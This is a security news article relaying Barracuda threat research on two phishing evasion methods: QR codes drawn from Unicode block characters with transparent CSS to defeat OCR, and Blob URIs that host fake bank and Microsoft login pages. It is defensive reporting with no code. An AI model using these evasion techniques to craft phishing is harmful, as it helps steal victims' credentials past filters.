24 Oct Clever phishing techniques: QR codes with ASCII and Blob URIs that bypass security
Learn how cybercriminals exploit QR codes.
Even the most carefully planned phishing campaigns fail if cybercriminals cannot bypass security measures.
In a blog post on the Barracuda website, Ashitosh Deshnur (Associate Threat Analyst in the Threat Analyst Team at Barracuda Networks) presents two innovative security bypass techniques recently identified by Barracuda’s threat analysts:
The first technique involves QR codes that, instead of being a static image, are built using a combination of ASCII/Unicode “block (█)” characters. This tactic aims to prevent security software from extracting the malicious URL from the QR code.
The second technique involves the use of “Blob” (binary large object) URIs (uniform resource identifiers), which access locally generated data within the browser, rather than relying on known malicious domains. These Blob URIs are created dynamically and can expire quickly, making them harder to track and analyze. Moreover, since some security mechanisms do not scrutinize Blob URIs as thoroughly as traditional HTTP or HTTPS links, phishing attacks using these URIs can bypass basic detection methods.
A New Generation of Malicious QR Codes
A year ago, phishing attacks using QR codes surged significantly. Barracuda data shows that approximately 1 in 20 mailboxes were targeted by QR code attacks in the last quarter of 2023.
These attacks typically used static, image-based QR codes. Attackers embedded malicious links into these codes, encouraging users to scan them, which led to fake websites designed to resemble trusted services or applications.
Security measures quickly adapted. Tools such as Optical Character Recognition (OCR) were able to extract, analyze, and block malicious URLs contained in QR codes.
Barracuda’s threat analysts, during testing, identified a new generation of QR code phishing designed to bypass OCR-based defenses. In these attacks, the “image” of the QR code is created using ASCII/Unicode characters.
In an email, such a QR code appears like a traditional QR code. However, to a typical OCR detection system, it seems meaningless.
Example 1
A phishing attack poses as a “Payroll and Benefits Registration” file, shared by an Administrator. When the unsuspecting recipient scans the QR code and clicks the link, they are redirected to a fake Microsoft login page.
A closer inspection of the QR code reveals a line between each block. This happens because the QR code is not an image, but carefully crafted using the “full block” character, or “█.”
The QR code is a 49×49 matrix composed of “full blocks” (█).
What was done to make the QR code look convincing?
In areas where white spaces are required, a cascading style sheet (CSS) was used to make the color of the block text fully transparent, rendering them invisible.
The QR code is a 49×49 matrix composed of “full blocks” (█).
What was done to make the QR code look convincing?
In areas where white spaces are required, a cascading style sheet (CSS) was used to make the color of the block text fully transparent, rendering them invisible.
Example 2
In this case, the attacker impersonates the courier company DHL and asks the recipient to fill out a form after scanning the QR code. Upon scanning the code, the victim is unexpectedly redirected to a phishing site.
Another important point is that, in the case of HTML entities, each “block” can have multiple representations, and attackers can use single blocks or combinations of them to generate QR codes based on ASCII/Unicode.
All of this increases the possibilities for combinations, making ASCII-based QR codes particularly difficult to detect.
Barracuda highlights that if security technologies identify the potential use of ASCII QR codes in a phishing attack, one of the simplest solutions is to take a screenshot of the phishing email and pass it to an OCR engine to read the URL hidden behind the QR code.
The Vast Potential of Blob URI to Bypass Security Measures
Blob URIs (also known as Blob URLs or Object URLs) are used by browsers to represent binary data or file-like objects (called Blobs) that are temporarily stored in the browser’s memory.
Blob URIs allow web developers to work with binary data, such as images, videos, or files, without having to upload or download them from an external server.
Because Blob URIs don’t retrieve data from external URLs, traditional URL filtering and scanning tools may initially fail to recognize the content as malicious.
Cybercriminals create phishing pages using Blob URIs, hoping that detection systems will have a harder time identifying and blocking malicious content.
One of the first examples of a phishing attack using Blob URIs, identified by Barracuda’s threat analysts, involved impersonating Capital One, encouraging users to click “Check your account.” This redirected them to an intermediary phishing page that generated a Blob URI and quickly redirected the browser to the newly created address.
What does a Blob URI do?
It displays a fake Capital One login page to the victim.
Threat analysts, during various tests, also noticed that the Blob URI technique was used in phishing attacks impersonating Chase and Air Canada.
Summary
Phishing techniques to evade detection have evolved significantly, posing an increasing threat to organizations. Cybercriminals are constantly improving their methods to bypass traditional security measures. As phishing attacks become more sophisticated, it is essential to implement multilayered defense strategies and promote a strong security culture.
Megharaj Balaraddi, Associate Threat Analyst at Barracuda, also contributed to the research for this blog post. The original article can be found on the Barracuda Blog.